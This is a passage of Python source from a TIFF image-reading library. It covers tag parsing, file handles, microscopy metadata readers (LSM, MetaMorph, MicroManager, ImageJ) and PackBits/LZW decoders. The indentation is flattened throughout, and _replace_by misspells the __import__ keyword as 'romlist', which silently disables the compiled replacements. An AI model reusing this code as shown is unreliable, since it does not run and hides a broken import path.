def _fromdata(self, code, dtype, count, value, name=None):
"""Initialize instance from arguments."""
self.code = int(code)
self.name = name if name else str(code)
self.dtype = TIFF_DATA_TYPES[dtype]
self.count = int(count)
self.value = value
self._value = value
self._type = dtype
def _fromfile(self, parent):
"""Read tag structure from open file. Advance file cursor."""
fh = parent.filehandle
byteorder = parent.byteorder
self._offset = fh.tell()
self.value_offset = self._offset + parent.offset_size + 4
fmt, size = {4: ('HHI4s', 12), 8: ('HHQ8s', 20)}[parent.offset_size]
data = fh.read(size)
code, dtype = struct.unpack(byteorder + fmt[:2], data[:4])
count, value = struct.unpack(byteorder + fmt[2:], data[4:])
self._value = value
self._type = dtype
if code in TIFF_TAGS:
name = TIFF_TAGS[code][0]
elif code in CUSTOM_TAGS:
name = CUSTOM_TAGS[code][0]
else:
name = str(code)
try:
dtype = TIFF_DATA_TYPES[self._type]
except KeyError:
raise TiffTag.Error("unknown tag data type %i" % self._type)
fmt = '%s%i%s' % (byteorder, count*int(dtype[0]), dtype[1])
size = struct.calcsize(fmt)
if size > parent.offset_size or code in CUSTOM_TAGS:
pos = fh.tell()
tof = {4: 'I', 8: 'Q'}[parent.offset_size]
self.value_offset = offset = struct.unpack(byteorder+tof, value)[0]
if offset < 0 or offset > parent.filehandle.size:
raise TiffTag.Error("corrupt file - invalid tag value offset")
elif offset < 4:
raise TiffTag.Error("corrupt value offset for tag %i" % code)
fh.seek(offset)
if code in CUSTOM_TAGS:
readfunc = CUSTOM_TAGS[code][1]
value = readfunc(fh, byteorder, dtype, count)
if isinstance(value, dict): # numpy.core.records.record
value = Record(value)
elif code in TIFF_TAGS or dtype[-1] == 's':
value = struct.unpack(fmt, fh.read(size))
else:
value = read_numpy(fh, byteorder, dtype, count)
fh.seek(pos)
else:
value = struct.unpack(fmt, value[:size])
if code not in CUSTOM_TAGS and code not in (273, 279, 324, 325):
# scalar value if not strip/tile offsets/byte_counts
if len(value) == 1:
value = value[0]
if (dtype.endswith('s') and isinstance(value, bytes)
and self._type != 7):
# TIFF ASCII fields can contain multiple strings,
# each terminated with a NUL
value = stripascii(value)
self.code = code
self.name = name
self.dtype = dtype
self.count = count
self.value = value
def _correct_lsm_bitspersample(self, parent):
"""Correct LSM bitspersample tag.
Old LSM writers may use a separate region for two 16-bit values,
although they fit into the tag value element of the tag.
"""
if self.code == 258 and self.count == 2:
# TODO: test this. Need example file.
warnings.warn("correcting LSM bitspersample tag")
fh = parent.filehandle
tof = {4: '<I', 8: '<Q'}[parent.offset_size]
self.value_offset = struct.unpack(tof, self._value)[0]
fh.seek(self.value_offset)
self.value = struct.unpack("<HH", fh.read(4))
def as_str(self):
"""Return value as human readable string."""
return ((str(self.value).split('\n', 1)[0]) if (self._type != 7)
else '<undefined>')
def __str__(self):
"""Return string containing information about tag."""
return ' '.join(str(getattr(self, s)) for s in self.__slots__)
class TiffSequence(object):
"""Sequence of image files.
The data shape and dtype of all files must match.
Properties
----------
files : list
List of file names.
shape : tuple
Shape of image sequence.
axes : str
Labels of axes in shape.
Examples
--------
>>> tifs = TiffSequence("test.oif.files/*.tif") # doctest: +SKIP
>>> tifs.shape, tifs.axes # doctest: +SKIP
((2, 100), 'CT')
>>> data = tifs.asarray() # doctest: +SKIP
>>> data.shape # doctest: +SKIP
(2, 100, 256, 256)
"""
_patterns = {
'axes': r"""
# matches Olympus OIF and Leica TIFF series
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
"""}
class ParseError(Exception):
pass
def __init__(self, files, imread=TiffFile, pattern='axes',
*args, **kwargs):
"""Initialize instance from multiple files.
Parameters
----------
files : str, or sequence of str
Glob pattern or sequence of file names.
imread : function or class
Image read function or class with asarray function returning numpy
array from single file.
pattern : str
Regular expression pattern that matches axes names and sequence
indices in file names.
By default this matches Olympus OIF and Leica TIFF series.
"""
if isinstance(files, basestring):
files = natural_sorted(glob.glob(files))
files = list(files)
if not files:
raise ValueError("no files found")
#if not os.path.isfile(files[0]):
# raise ValueError("file not found")
self.files = files
if hasattr(imread, 'asarray'):
# redefine imread
_imread = imread
def imread(fname, *args, **kwargs):
with _imread(fname) as im:
return im.asarray(*args, **kwargs)
self.imread = imread
self.pattern = self._patterns.get(pattern, pattern)
try:
self._parse()
if not self.axes:
self.axes = 'I'
except self.ParseError:
self.axes = 'I'
self.shape = (len(files),)
self._start_index = (0,)
self._indices = tuple((i,) for i in range(len(files)))
def __str__(self):
"""Return string with information about image sequence."""
return "\n".join([
self.files[0],
'* files: %i' % len(self.files),
'* axes: %s' % self.axes,
'* shape: %s' % str(self.shape)])
def __len__(self):
return len(self.files)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def close(self):
pass
def asarray(self, memmap=False, *args, **kwargs):
"""Read image data from all files and return as single numpy array.
If memmap is True, return an array stored in a binary file on disk.
The args and kwargs parameters are passed to the imread function.
Raise IndexError or ValueError if image shapes don't match.
"""
im = self.imread(self.files[0], *args, **kwargs)
shape = self.shape + im.shape
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=im.dtype, shape=shape)
else:
result = numpy.zeros(shape, dtype=im.dtype)
result = result.reshape(-1, *im.shape)
for index, fname in zip(self._indices, self.files):
index = [i-j for i, j in zip(index, self._start_index)]
index = numpy.ravel_multi_index(index, self.shape)
im = self.imread(fname, *args, **kwargs)
result[index] = im
result.shape = shape
return result
def _parse(self):
"""Get axes and shape from file names."""
if not self.pattern:
raise self.ParseError("invalid pattern")
pattern = re.compile(self.pattern, re.IGNORECASE | re.VERBOSE)
matches = pattern.findall(self.files[0])
if not matches:
raise self.ParseError("pattern doesn't match file names")
matches = matches[-1]
if len(matches) % 2:
raise self.ParseError("pattern doesn't match axis name and index")
axes = ''.join(m for m in matches[::2] if m)
if not axes:
raise self.ParseError("pattern doesn't match file names")
indices = []
for fname in self.files:
matches = pattern.findall(fname)[-1]
if axes != ''.join(m for m in matches[::2] if m):
raise ValueError("axes don't match within the image sequence")
indices.append([int(m) for m in matches[1::2] if m])
shape = tuple(numpy.max(indices, axis=0))
start_index = tuple(numpy.min(indices, axis=0))
shape = tuple(i-j+1 for i, j in zip(shape, start_index))
if product(shape) != len(self.files):
warnings.warn("files are missing. Missing data are zeroed")
self.axes = axes.upper()
self.shape = shape
self._indices = indices
self._start_index = start_index
class Record(dict):
"""Dictionary with attribute access.
Can also be initialized with numpy.core.records.record.
"""
__slots__ = ()
def __init__(self, arg=None, **kwargs):
if kwargs:
arg = kwargs
elif arg is None:
arg = {}
try:
dict.__init__(self, arg)
except (TypeError, ValueError):
for i, name in enumerate(arg.dtype.names):
v = arg[i]
self[name] = v if v.dtype.char != 'S' else stripnull(v)
def __getattr__(self, name):
return self[name]
def __setattr__(self, name, value):
self.__setitem__(name, value)
def __str__(self):
"""Pretty print Record."""
s = []
lists = []
for k in sorted(self):
try:
if k.startswith('_'): # does not work with byte
continue
except AttributeError:
pass
v = self[k]
if isinstance(v, (list, tuple)) and len(v):
if isinstance(v[0], Record):
lists.append((k, v))
continue
elif isinstance(v[0], TiffPage):
v = [i.index for i in v if i]
s.append(
("* %s: %s" % (k, str(v))).split("\n", 1)[0]
[:PRINT_LINE_LEN].rstrip())
for k, v in lists:
l = []
for i, w in enumerate(v):
l.append("* %s[%i]\n %s" % (k, i,
str(w).replace("\n", "\n ")))
s.append('\n'.join(l))
return '\n'.join(s)
class TiffTags(Record):
"""Dictionary of TiffTag with attribute access."""
def __str__(self):
"""Return string with information about all tags."""
s = []
for tag in sorted(self.values(), key=lambda x: x.code):
typecode = "%i%s" % (tag.count * int(tag.dtype[0]), tag.dtype[1])
line = "* %i %s (%s) %s" % (
tag.code, tag.name, typecode, tag.as_str())
s.append(line[:PRINT_LINE_LEN].lstrip())
return '\n'.join(s)
class FileHandle(object):
"""Binary file handle.
* Handle embedded files (for CZI within CZI files).
* Allow to re-open closed files (for multi file formats such as OME-TIFF).
* Read numpy arrays and records from file like objects.
Only binary read, seek, tell, and close are supported on embedded files.
When initialized from another file handle, do not use it unless this
FileHandle is closed.
Attributes
----------
name : str
Name of the file.
path : str
Absolute path to file.
size : int
Size of file in bytes.
is_file : bool
If True, file has a filno and can be memory mapped.
All attributes are read-only.
"""
__slots__ = ('_fh', '_arg', '_mode', '_name', '_dir',
'_offset', '_size', '_close', 'is_file')
def __init__(self, arg, mode='rb', name=None, offset=None, size=None):
"""Initialize file handle from file name or another file handle.
Parameters
----------
arg : str, File, or FileHandle
File name or open file handle.
mode : str
File open mode in case 'arg' is a file name.
name : str
Optional name of file in case 'arg' is a file handle.
offset : int
Optional start position of embedded file. By default this is
the current file position.
size : int
Optional size of embedded file. By default this is the number
of bytes from the 'offset' to the end of the file.
"""
self._fh = None
self._arg = arg
self._mode = mode
self._name = name
self._dir = ''
self._offset = offset
self._size = size
self._close = True
self.is_file = False
self.open()
def open(self):
"""Open or re-open file."""
if self._fh:
return # file is open
if isinstance(self._arg, basestring):
# file name
self._arg = os.path.abspath(self._arg)
self._dir, self._name = os.path.split(self._arg)
self._fh = open(self._arg, self._mode)
self._close = True
if self._offset is None:
self._offset = 0
elif isinstance(self._arg, FileHandle):
# FileHandle
self._fh = self._arg._fh
if self._offset is None:
self._offset = 0
self._offset += self._arg._offset
self._close = False
if not self._name:
if self._offset:
name, ext = os.path.splitext(self._arg._name)
self._name = "%s@%i%s" % (name, self._offset, ext)
else:
self._name = self._arg._name
self._dir = self._arg._dir
else:
# open file object
self._fh = self._arg
if self._offset is None:
self._offset = self._arg.tell()
self._close = False
if not self._name:
try:
self._dir, self._name = os.path.split(self._fh.name)
except AttributeError:
self._name = "Unnamed stream"
if self._offset:
self._fh.seek(self._offset)
if self._size is None:
pos = self._fh.tell()
self._fh.seek(self._offset, 2)
self._size = self._fh.tell()
self._fh.seek(pos)
try:
self._fh.fileno()
self.is_file = True
except Exception:
self.is_file = False
def read(self, size=-1):
"""Read 'size' bytes from file, or until EOF is reached."""
if size < 0 and self._offset:
size = self._size
return self._fh.read(size)
def memmap_array(self, dtype, shape, offset=0, mode='r', order='C'):
"""Return numpy.memmap of data stored in file."""
if not self.is_file:
raise ValueError("Can not memory map file without fileno.")
return numpy.memmap(self._fh, dtype=dtype, mode=mode,
offset=self._offset + offset,
shape=shape, order=order)
def read_array(self, dtype, count=-1, sep=""):
"""Return numpy array from file.
Work around numpy issue #2230, "numpy.fromfile does not accept
StringIO object" https://github.com/numpy/numpy/issues/2230.
"""
try:
return numpy.fromfile(self._fh, dtype, count, sep)
except IOError:
if count < 0:
size = self._size
else:
size = count * numpy.dtype(dtype).itemsize
data = self._fh.read(size)
return numpy.fromstring(data, dtype, count, sep)
def read_record(self, dtype, shape=1, byteorder=None):
"""Return numpy record from file."""
try:
rec = numpy.rec.fromfile(self._fh, dtype, shape,
byteorder=byteorder)
except Exception:
dtype = numpy.dtype(dtype)
if shape is None:
shape = self._size // dtype.itemsize
size = product(sequence(shape)) * dtype.itemsize
data = self._fh.read(size)
return numpy.rec.fromstring(data, dtype, shape,
byteorder=byteorder)
return rec[0] if shape == 1 else rec
def tell(self):
"""Return file's current position."""
return self._fh.tell() - self._offset
def seek(self, offset, whence=0):
"""Set file's current position."""
if self._offset:
if whence == 0:
self._fh.seek(self._offset + offset, whence)
return
elif whence == 2:
self._fh.seek(self._offset + self._size + offset, 0)
return
self._fh.seek(offset, whence)
def close(self):
"""Close file."""
if self._close and self._fh:
self._fh.close()
self._fh = None
self.is_file = False
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def __getattr__(self, name):
"""Return attribute from underlying file object."""
if self._offset:
warnings.warn(
"FileHandle: '%s' not implemented for embedded files" % name)
return getattr(self._fh, name)
@property
def name(self):
return self._name
@property
def dirname(self):
return self._dir
@property
def path(self):
return os.path.join(self._dir, self._name)
@property
def size(self):
return self._size
@property
def closed(self):
return self._fh is None
def read_bytes(fh, byteorder, dtype, count):
"""Read tag data from file and return as byte string."""
dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1]
return fh.read_array(dtype, count).tostring()
def read_numpy(fh, byteorder, dtype, count):
"""Read tag data from file and return as numpy array."""
dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1]
return fh.read_array(dtype, count)
def read_json(fh, byteorder, dtype, count):
"""Read JSON tag data from file and return as object."""
data = fh.read(count)
try:
return json.loads(unicode(stripnull(data), 'utf-8'))
except ValueError:
warnings.warn("invalid JSON `%s`" % data)
def read_mm_header(fh, byteorder, dtype, count):
"""Read MM_HEADER tag from file and return as numpy.rec.array."""
return fh.read_record(MM_HEADER, byteorder=byteorder)
def read_mm_stamp(fh, byteorder, dtype, count):
"""Read MM_STAMP tag from file and return as numpy.array."""
return fh.read_array(byteorder+'f8', 8)
def read_uic1tag(fh, byteorder, dtype, count, plane_count=None):
"""Read MetaMorph STK UIC1Tag from file and return as dictionary.
Return empty dictionary if plane_count is unknown.
"""
assert dtype in ('2I', '1I') and byteorder == '<'
result = {}
if dtype == '2I':
# pre MetaMorph 2.5 (not tested)
values = fh.read_array('<u4', 2*count).reshape(count, 2)
result = {'z_distance': values[:, 0] / values[:, 1]}
elif plane_count:
for i in range(count):
tagid = struct.unpack('<I', fh.read(4))[0]
if tagid in (28, 29, 37, 40, 41):
# silently skip unexpected tags
fh.read(4)
continue
name, value = read_uic_tag(fh, tagid, plane_count, offset=True)
result[name] = value
return result
def read_uic2tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC2Tag from file and return as dictionary."""
assert dtype == '2I' and byteorder == '<'
values = fh.read_array('<u4', 6*plane_count).reshape(plane_count, 6)
return {
'z_distance': values[:, 0] / values[:, 1],
'date_created': values[:, 2], # julian days
'time_created': values[:, 3], # milliseconds
'date_modified': values[:, 4], # julian days
'time_modified': values[:, 5], # milliseconds
}
def read_uic3tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC3Tag from file and return as dictionary."""
assert dtype == '2I' and byteorder == '<'
values = fh.read_array('<u4', 2*plane_count).reshape(plane_count, 2)
return {'wavelengths': values[:, 0] / values[:, 1]}
def read_uic4tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC4Tag from file and return as dictionary."""
assert dtype == '1I' and byteorder == '<'
result = {}
while True:
tagid = struct.unpack('<H', fh.read(2))[0]
if tagid == 0:
break
name, value = read_uic_tag(fh, tagid, plane_count, offset=False)
result[name] = value
return result
def read_uic_tag(fh, tagid, plane_count, offset):
"""Read a single UIC tag value from file and return tag name and value.
UIC1Tags use an offset.
"""
def read_int(count=1):
value = struct.unpack('<%iI' % count, fh.read(4*count))
return value[0] if count == 1 else value
try:
name, dtype = UIC_TAGS[tagid]
except KeyError:
# unknown tag
return '_tagid_%i' % tagid, read_int()
if offset:
pos = fh.tell()
if dtype not in (int, None):
off = read_int()
if off < 8:
warnings.warn("invalid offset for uic tag '%s': %i"
% (name, off))
return name, off
fh.seek(off)
if dtype is None:
# skip
name = '_' + name
value = read_int()
elif dtype is int:
# int
value = read_int()
elif dtype is Fraction:
# fraction
value = read_int(2)
value = value[0] / value[1]
elif dtype is julian_datetime:
# datetime
value = julian_datetime(*read_int(2))
elif dtype is read_uic_image_property:
# ImagePropertyEx
value = read_uic_image_property(fh)
elif dtype is str:
# pascal string
size = read_int()
if 0 <= size < 2**10:
value = struct.unpack('%is' % size, fh.read(size))[0][:-1]
value = stripnull(value)
elif offset:
value = ''
warnings.warn("corrupt string in uic tag '%s'" % name)
else:
raise ValueError("invalid string size %i" % size)
elif dtype == '%ip':
# sequence of pascal strings
value = []
for i in range(plane_count):
size = read_int()
if 0 <= size < 2**10:
string = struct.unpack('%is' % size, fh.read(size))[0][:-1]
string = stripnull(string)
value.append(string)
elif offset:
warnings.warn("corrupt string in uic tag '%s'" % name)
else:
raise ValueError("invalid string size %i" % size)
else:
# struct or numpy type
dtype = '<' + dtype
if '%i' in dtype:
dtype = dtype % plane_count
if '(' in dtype:
# numpy type
value = fh.read_array(dtype, 1)[0]
if value.shape[-1] == 2:
# assume fractions
value = value[..., 0] / value[..., 1]
else:
# struct format
value = struct.unpack(dtype, fh.read(struct.calcsize(dtype)))
if len(value) == 1:
value = value[0]
if offset:
fh.seek(pos + 4)
return name, value
def read_uic_image_property(fh):
"""Read UIC ImagePropertyEx tag from file and return as dict."""
# TODO: test this
size = struct.unpack('B', fh.read(1))[0]
name = struct.unpack('%is' % size, fh.read(size))[0][:-1]
flags, prop = struct.unpack('<IB', fh.read(5))
if prop == 1:
value = struct.unpack('II', fh.read(8))
value = value[0] / value[1]
else:
size = struct.unpack('B', fh.read(1))[0]
value = struct.unpack('%is' % size, fh.read(size))[0]
return dict(name=name, flags=flags, value=value)
def read_cz_lsm_info(fh, byteorder, dtype, count):
"""Read CS_LSM_INFO tag from file and return as numpy.rec.array."""
assert byteorder == '<'
magic_number, structure_size = struct.unpack('<II', fh.read(8))
if magic_number not in (50350412, 67127628):
raise ValueError("not a valid CS_LSM_INFO structure")
fh.seek(-8, 1)
if structure_size < numpy.dtype(CZ_LSM_INFO).itemsize:
# adjust structure according to structure_size
cz_lsm_info = []
size = 0
for name, dtype in CZ_LSM_INFO:
size += numpy.dtype(dtype).itemsize
if size > structure_size:
break
cz_lsm_info.append((name, dtype))
else:
cz_lsm_info = CZ_LSM_INFO
return fh.read_record(cz_lsm_info, byteorder=byteorder)
def read_cz_lsm_floatpairs(fh):
"""Read LSM sequence of float pairs from file and return as list."""
size = struct.unpack('<i', fh.read(4))[0]
return fh.read_array('<2f8', count=size)
def read_cz_lsm_positions(fh):
"""Read LSM positions from file and return as list."""
size = struct.unpack('<I', fh.read(4))[0]
return fh.read_array('<2f8', count=size)
def read_cz_lsm_time_stamps(fh):
"""Read LSM time stamps from file and return as list."""
size, count = struct.unpack('<ii', fh.read(8))
if size != (8 + 8 * count):
raise ValueError("lsm_time_stamps block is too short")
# return struct.unpack('<%dd' % count, fh.read(8*count))
return fh.read_array('<f8', count=count)
def read_cz_lsm_event_list(fh):
"""Read LSM events from file and return as list of (time, type, text)."""
count = struct.unpack('<II', fh.read(8))[1]
events = []
while count > 0:
esize, etime, etype = struct.unpack('<IdI', fh.read(16))
etext = stripnull(fh.read(esize - 16))
events.append((etime, etype, etext))
count -= 1
return events
def read_cz_lsm_scan_info(fh):
"""Read LSM scan information from file and return as Record."""
block = Record()
blocks = [block]
unpack = struct.unpack
if 0x10000000 != struct.unpack('<I', fh.read(4))[0]:
# not a Recording sub block
raise ValueError("not a lsm_scan_info structure")
fh.read(8)
while True:
entry, dtype, size = unpack('<III', fh.read(12))
if dtype == 2:
# ascii
value = stripnull(fh.read(size))
elif dtype == 4:
# long
value = unpack('<i', fh.read(4))[0]
elif dtype == 5:
# rational
value = unpack('<d', fh.read(8))[0]
else:
value = 0
if entry in CZ_LSM_SCAN_INFO_ARRAYS:
blocks.append(block)
name = CZ_LSM_SCAN_INFO_ARRAYS[entry]
newobj = []
setattr(block, name, newobj)
block = newobj
elif entry in CZ_LSM_SCAN_INFO_STRUCTS:
blocks.append(block)
newobj = Record()
block.append(newobj)
block = newobj
elif entry in CZ_LSM_SCAN_INFO_ATTRIBUTES:
name = CZ_LSM_SCAN_INFO_ATTRIBUTES[entry]
setattr(block, name, value)
elif entry == 0xffffffff:
# end sub block
block = blocks.pop()
else:
# unknown entry
setattr(block, "entry_0x%x" % entry, value)
if not blocks:
break
return block
def read_nih_image_header(fh, byteorder, dtype, count):
"""Read NIH_IMAGE_HEADER tag from file and return as numpy.rec.array."""
a = fh.read_record(NIH_IMAGE_HEADER, byteorder=byteorder)
a = a.newbyteorder(byteorder)
a.xunit = a.xunit[:a._xunit_len]
a.um = a.um[:a._um_len]
return a
def read_micromanager_metadata(fh):
"""Read MicroManager non-TIFF settings from open file and return as dict.
The settings can be used to read image data without parsing the TIFF file.
Raise ValueError if file does not contain valid MicroManager metadata.
"""
fh.seek(0)
try:
byteorder = {b'II': '<', b'MM': '>'}[fh.read(2)]
except IndexError:
raise ValueError("not a MicroManager TIFF file")
results = {}
fh.seek(8)
(index_header, index_offset, display_header, display_offset,
comments_header, comments_offset, summary_header, summary_length
) = struct.unpack(byteorder + "IIIIIIII", fh.read(32))
if summary_header != 2355492:
raise ValueError("invalid MicroManager summary_header")
results['summary'] = read_json(fh, byteorder, None, summary_length)
if index_header != 54773648:
raise ValueError("invalid MicroManager index_header")
fh.seek(index_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 3453623:
raise ValueError("invalid MicroManager index_header")
data = struct.unpack(byteorder + "IIIII"*count, fh.read(20*count))
results['index_map'] = {
'channel': data[::5], 'slice': data[1::5], 'frame': data[2::5],
'position': data[3::5], 'offset': data[4::5]}
if display_header != 483765892:
raise ValueError("invalid MicroManager display_header")
fh.seek(display_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 347834724:
raise ValueError("invalid MicroManager display_header")
results['display_settings'] = read_json(fh, byteorder, None, count)
if comments_header != 99384722:
raise ValueError("invalid MicroManager comments_header")
fh.seek(comments_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 84720485:
raise ValueError("invalid MicroManager comments_header")
results['comments'] = read_json(fh, byteorder, None, count)
return results
def imagej_metadata(data, bytecounts, byteorder):
"""Return dict from ImageJ metadata tag value."""
_str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252')
def read_string(data, byteorder):
return _str(stripnull(data[0 if byteorder == '<' else 1::2]))
def read_double(data, byteorder):
return struct.unpack(byteorder+('d' * (len(data) // 8)), data)
def read_bytes(data, byteorder):
#return struct.unpack('b' * len(data), data)
return numpy.fromstring(data, 'uint8')
metadata_types = { # big endian
b'info': ('info', read_string),
b'labl': ('labels', read_string),
b'rang': ('ranges', read_double),
b'luts': ('luts', read_bytes),
b'roi ': ('roi', read_bytes),
b'over': ('overlays', read_bytes)}
metadata_types.update( # little endian
dict((k[::-1], v) for k, v in metadata_types.items()))
if not bytecounts:
raise ValueError("no ImageJ metadata")
if not data[:4] in (b'IJIJ', b'JIJI'):
raise ValueError("invalid ImageJ metadata")
header_size = bytecounts[0]
if header_size < 12 or header_size > 804:
raise ValueError("invalid ImageJ metadata header size")
ntypes = (header_size - 4) // 8
header = struct.unpack(byteorder+'4sI'*ntypes, data[4:4+ntypes*8])
pos = 4 + ntypes * 8
counter = 0
result = {}
for mtype, count in zip(header[::2], header[1::2]):
values = []
name, func = metadata_types.get(mtype, (_str(mtype), read_bytes))
for _ in range(count):
counter += 1
pos1 = pos + bytecounts[counter]
values.append(func(data[pos:pos1], byteorder))
pos = pos1
result[name.strip()] = values[0] if count == 1 else values
return result
def imagej_description(description):
"""Return dict from ImageJ image_description tag."""
def _bool(val):
return {b'true': True, b'false': False}[val.lower()]
_str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252')
result = {}
for line in description.splitlines():
try:
key, val = line.split(b'=')
except Exception:
continue
key = key.strip()
val = val.strip()
for dtype in (int, float, _bool, _str):
try:
val = dtype(val)
break
except Exception:
pass
result[_str(key)] = val
return result
def _replace_by(module_function, package=None, warn=False):
"""Try replace decorated function by module.function.
This is used to replace local functions with functions from another
(usually compiled) module, if available.
Parameters
----------
module_function : str
Module and function path string (e.g. numpy.ones)
package : str, optional
The parent package of the module
warn : bool, optional
Whether to warn when wrapping fails
Returns
-------
func : function
Wrapped function, hopefully calling a function in another module.
Example
-------
>>> @_replace_by('_tifffile.decodepackbits')
... def decodepackbits(encoded):
... raise NotImplementedError
"""
def decorate(func, module_function=module_function, warn=warn):
try:
modname, function = module_function.split('.')
if package is None:
full_name = modname
else:
full_name = package + '.' + modname
module = __import__(full_name, romlist=[modname])
func, oldfunc = getattr(module, function), func
globals()['__old_' + func.__name__] = oldfunc
except Exception:
if warn:
warnings.warn("failed to import %s" % module_function)
return func
return decorate
def decodejpg(encoded, tables=b'', photometric=None,
ycbcr_subsampling=None, ycbcr_positioning=None):
"""Decode JPEG encoded byte string (using _czifile extension module)."""
import _czifile
image = _czifile.decodejpg(encoded, tables)
if photometric == 'rgb' and ycbcr_subsampling and ycbcr_positioning:
# TODO: convert YCbCr to RGB
pass
return image.tostring()
@_replace_by('_tifffile.decodepackbits')
def decodepackbits(encoded):
"""Decompress PackBits encoded byte string.
PackBits is a simple byte-oriented run-length compression scheme.
"""
func = ord if sys.version[0] == '2' else lambda x: x
result = []
result_extend = result.extend
i = 0
try:
while True:
n = func(encoded[i]) + 1
i += 1
if n < 129:
result_extend(encoded[i:i+n])
i += n
elif n > 129:
result_extend(encoded[i:i+1] * (258-n))
i += 1
except IndexError:
pass
return b''.join(result) if sys.version[0] == '2' else bytes(result)
@_replace_by('_tifffile.decodelzw')
def decodelzw(encoded):
"""Decompress LZW (Lempel-Ziv-Welch) encoded TIFF strip (byte string).
The strip must begin with a CLEAR code and end with an EOI code.
This is an implementation of the LZW decoding algorithm described in (1).
It is not compatible with old style LZW compressed files like quad-lzw.tif.
"""
len_encoded = len(encoded)
bitcount_max = len_encoded * 8
unpack = struct.unpack
if sys.version[0] == '2':
newtable = [chr(i) for i in range(256)]
else:
newtable = [bytes([i]) for i in range(256)]
newtable.extend((0, 0))
def next_code():
"""Return integer of `bitw` bits at `bitcount` position in encoded."""
start = bitcount // 8
s = encoded[start:start+4]
try:
code = unpack('>I', s)[0]
except Exception:
code = unpack('>I', s + b'\x00'*(4-len(s)))[0]
code <<= bitcount % 8
code &= mask
return code >> shr
switchbitch = { # code: bit-width, shr-bits, bit-mask
255: (9, 23, int(9*'1'+'0'*23, 2)),
511: (10, 22, int(10*'1'+'0'*22, 2)),
1023: (11, 21, int(11*'1'+'0'*21, 2)),
2047: (12, 20, int(12*'1'+'0'*20, 2)), }
bitw, shr, mask = switchbitch[255]
bitcount = 0
if len_encoded < 4:
raise ValueError("strip must be at least 4 characters long")
if next_code() != 256:
raise ValueError("strip must begin with CLEAR code")
code = 0
oldcode = 0
result = []
result_append = result.append
while True:
code = next_code() # ~5% faster when inlining this function
bitcount += bitw
if code == 257 or bitcount >= bitcount_max: # EOI
break
if code == 256: # CLEAR
table = newtable[:]
table_append = table.append
lentable = 258
bitw, shr, mask = switchbitch[255]
code = next_code()
bitcount += bitw
if code == 257: # EOI
break
result_append(table[code])
else:
if code < lentable:
decoded = table[code]
newcode = table[oldcode] + decoded[:1]
else:
newcode = table[oldcode]
newcode += newcode[:1]
decoded = newcode
result_append(decoded)
table_append(newcode)
lentable += 1
oldcode = code
if lentable in switchbitch:
bitw, shr, mask = switchbitch[lentable]
if code != 257:
warnings.warn("unexpected end of lzw stream (code %i)" % code)
return b''.join(result)
@_replace_by('_tifffile.unpackints')
def unpackints(data, dtype, itemsize, runlen=0):
"""Decompress byte string to array of integers of any bit size <= 32.
Parameters
----------
data : byte str
Data to decompress.
dtype : numpy.dtype or str
A numpy boolean or integer type.
itemsize : int
Number of bits per integer.
runlen : int
Number of consecutive integers, after which to start at next byte.
"""
if itemsize == 1: # bitarray
data = numpy.fromstring(data, '|B')
data = numpy.unpackbits(data)
if runlen % 8:
data = data.reshape(-1, runlen + (8 - runlen % 8))
data = data[:, :runlen].reshape(-1)
return data.astype(dtype)
dtype = numpy.dtype(dtype)
if itemsize in (8, 16, 32, 64):
return numpy.fromstring(data, dtype)
if itemsize < 1 or itemsize > 32:
raise ValueError("itemsize out of range: %i" % itemsize)
if dtype.kind not in "biu":
raise ValueError("invalid dtype")
itembytes = next(i for i in (1, 2, 4, 8) if 8 * i >= itemsize)
if itembytes != dtype.itemsize:
raise ValueError("dtype.itemsize too small")
if runlen == 0:
runlen = len(data) // itembytes
skipbits = runlen*itemsize % 8
if skipbits:
skipbits = 8 - skipbits
shrbits = itembytes*8 - itemsize
bitmask = int(itemsize*'1'+'0'*shrbits, 2)
dtypestr = '>' + dtype.char # dtype always big endian?
unpack = struct.unpack
l = runlen * (len(data)*8 // (runlen*itemsize + skipbits))
result = numpy.empty((l, ), dtype)
bitcount = 0
for i in range(len(result)):
start = bitcount // 8
s = data[start:start+itembytes]
try:
code = unpack(dtypestr, s)[0]
except Exception:
code = unpack(dtypestr, s + b'\x00'*(itembytes-len(s)))[0]
code <<= bitcount % 8
code &= bitmask
result[i] = code >> shrbits
bitcount += itemsize
if (i+1) % runlen == 0:
bitcount += skipbits
return result
def unpackrgb(data, dtype='<B', bitspersample=(5, 6, 5), rescale=True):
"""Return array from byte string containing packed samples.
Use to unpack RGB565 or RGB555 to RGB888 format.
Parameters
----------
data : byte str
The data to be decoded. Samples in each pixel are stored consecutively.
Pixels are aligned to 8, 16, or 32 bit boundaries.
dtype : numpy.dtype
The sample data type. The byteorder applies also to the data stream.
bitspersample : tuple
Number of bits for each sample in a pixel.
rescale : bool
Upscale samples to the number of bits in dtype.
Returns
-------
result : ndarray
Flattened array of unpacked samples of native dtype.
Examples
--------
>>> data = struct.pack('BBBB', 0x21, 0x08, 0xff, 0xff)
>>> print(unpackrgb(data, '<B', (5, 6, 5), False))
[ 1 1 1 31 63 31]
>>> print(unpackrgb(data, '<B', (5, 6, 5)))
[ 8 4 8 255 255 255]
>>> print(unpackrgb(data, '<B', (5, 5, 5)))
[ 16 8 8 255 255 255]
"""
dtype = numpy.dtype(dtype)
